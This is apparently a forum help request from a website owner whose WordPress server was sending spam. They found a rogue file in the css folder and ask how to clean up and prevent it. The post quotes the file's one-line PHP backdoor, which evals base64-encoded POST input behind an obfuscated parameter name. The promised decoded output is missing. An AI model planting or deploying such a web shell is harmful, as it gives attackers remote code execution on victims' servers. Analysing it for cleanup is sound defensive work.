Malicious PHP file found on my webserver, need help cleaning and preventing this from happening again


Staff member
My hosting provider recently suspended my website because something on it was sending out enormous amounts of spam email. Originally me and the provider thought that this was due to an unsecured form for an email campaign I put up on the server a couple days prior. I removed the page with the form from the server, but the server was still sending spam emails.

I found a php file named 7c32.php in the "css" folder in the root directory of the server. I definitely did not make it. Here is the code that was in the file:

<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>

After running it through an online decoder, this is what it came up with:


I did some reading about malicious php files and saw that the eval( and base64_decode strings were highly suspect. I looked through the server log file and saw several post queries with this 7c32.php file originating from an ip address from Saudi Arabia.

I deleted the php file, updated all outdated wordpress themes and plugins (as well as the platform itsself, and changed the password to the FTP server and Wordpress administrative account to something much more secure.

Is there anything else I can do to ensure my server is secure? I'm about to go search for these base64 and eval( strings in every other php file on the server, but other than that, I'm out of ideas.

This php script seems rather too short to do any damage, but what else can be sending out all of that spam mail?

Any help would be greatly appreciated.